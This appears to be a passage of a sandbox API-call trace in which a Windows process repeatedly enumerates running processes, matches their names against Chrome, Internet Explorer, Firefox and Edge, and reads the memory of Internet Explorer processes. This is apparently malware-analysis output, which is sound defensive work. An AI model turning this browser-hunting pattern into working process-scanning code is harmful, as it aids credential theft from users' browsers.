	[0249.842] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.843] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0249.844] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x9f28
	[0249.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.844] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0249.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.844] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.845] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0249.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.846] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.846] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0249.847] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x9f2c
	[0249.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.847] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0249.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.847] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.848] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0249.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.848] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.849] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0249.849] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x9f30
	[0249.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.850] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0249.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.290] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0250.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.290] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0250.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.290] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.290] NtQueryInformationProcess (in: ProcessHandle=0x9f30, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0250.291] ReadProcessMemory (in: hProcess=0x9f30, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0250.291] ReadProcessMemory (in: hProcess=0x9f30, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0250.291] ReadProcessMemory (in: hProcess=0x9f30, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0250.291] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0250.291] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0250.292] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x9f34
	[0250.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.292] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0250.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.292] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0250.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.292] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0250.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.293] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.293] NtQueryInformationProcess (in: ProcessHandle=0x9f34, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0250.293] ReadProcessMemory (in: hProcess=0x9f34, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0250.293] ReadProcessMemory (in: hProcess=0x9f34, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0250.293] ReadProcessMemory (in: hProcess=0x9f34, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0250.293] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0250.294] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0250.294] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x9f38
	[0250.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.294] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0250.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.295] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.297] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0250.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.297] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.297] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0250.298] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x9f3c
	[0250.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.298] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0250.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.298] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.299] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0250.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.299] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.299] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.300] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x9f40
	[0250.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.300] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.301] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.301] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.301] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.301] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.302] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.303] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x9f44
	[0250.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.303] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.304] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.304] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.304] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.305] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.305] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x9f48
	[0250.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.305] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.306] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.306] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.306] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.307] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0250.307] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x9f4c
	[0250.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.307] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0250.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.308] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.308] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0250.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.308] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.309] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.309] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x9f50
	[0250.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.310] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.310] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.310] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.311] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.311] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.311] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x9f54
	[0250.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.312] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.312] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.312] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.313] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.313] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0250.313] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x9f58
	[0250.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.314] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0250.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.314] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.314] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0250.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.314] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.315] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0250.315] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x9f5c
	[0250.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.315] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.316] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.316] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.316] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.317] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0250.317] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x9f60
	[0250.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.317] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0250.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.318] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.318] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0250.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.319] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.319] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.319] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x9f64
	[0250.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.320] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.320] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.320] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.321] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.321] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0250.322] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0x9f68
	[0250.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.322] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0250.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.322] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.323] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0250.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.323] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.323] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0250.324] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0x9f6c
	[0250.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.324] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.325] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.325] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.325] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.325] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0250.326] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0x9f70
	[0250.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.326] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0250.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.327] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.327] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0250.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.327] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.327] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0250.329] CloseHandle (hObject=0x4fd0) returned 1
	[0250.380] Sleep (dwMilliseconds=0x64) 
	[0250.534] GetCurrentProcessId () returned 0x110
	[0250.534] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0250.537] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0250.538] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0250.539] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0250.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x9f74
	[0250.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.539] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0250.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.540] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.540] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0250.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.540] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.540] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0250.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x9f78
	[0250.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.541] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0250.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.542] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.542] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0250.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.542] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.542] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0250.552] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x9f7c
